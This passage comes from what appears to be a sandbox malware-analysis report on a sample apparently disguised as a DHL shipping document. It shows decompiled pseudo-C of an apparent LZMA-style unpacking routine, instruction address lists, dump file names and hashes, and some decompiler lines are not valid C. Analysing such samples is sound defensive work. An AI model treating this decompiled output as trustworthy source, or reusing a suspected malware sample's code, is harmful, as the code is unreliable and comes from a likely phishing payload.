								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                              0x00000000
                                                              0x004070ab
                                                              0x004070ab
                                                              0x004070af
                                                              0x00407166
                                                              0x00407169
                                                              0x00407175
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00407441
                                                              0x00407441
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x0040741c
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x00000000
                                                              0x004075cf
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00000000
                                                              0x0040743e
                                                              0x004070b5
                                                              0x004070b9
                                                              0x004075fa
                                                              0x004075fa
                                                              0x004075fd
                                                              0x00407601
                                                              0x00407601
                                                              0x004070bf
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x004075e5
                                                              0x004075ed
                                                              0x004075f4
                                                              0x004075f6
                                                              0x00000000
                                                              0x004075f6
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x0040710d
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x00000000
                                                              0x00406dec
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407020
                                                              0x00407023
                                                              0x0040702a
                                                              0x0040702d
                                                              0x00407030
                                                              0x00407033
                                                              0x00407036
                                                              0x00407039
                                                              0x0040703b
                                                              0x00407042
                                                              0x00407043
                                                              0x00407045
                                                              0x00407048
                                                              0x0040704b
                                                              0x0040704e
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407053
                                                              0x00407004
                                                              0x00407007
                                                              0x0040700a
                                                              0x00407014
                                                              0x00000000
                                                              0x00000000
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x00000000
                                                              0x00407137
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407395
                                                              0x00407399
                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x00000000
                                                              0x004073c8
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00000000
                                                              0x00407489
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00000000
                                                              0x0040753b
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x00000000
                                                              0x00407390
                                                              0x0040738e
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                              • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                              • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                              • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
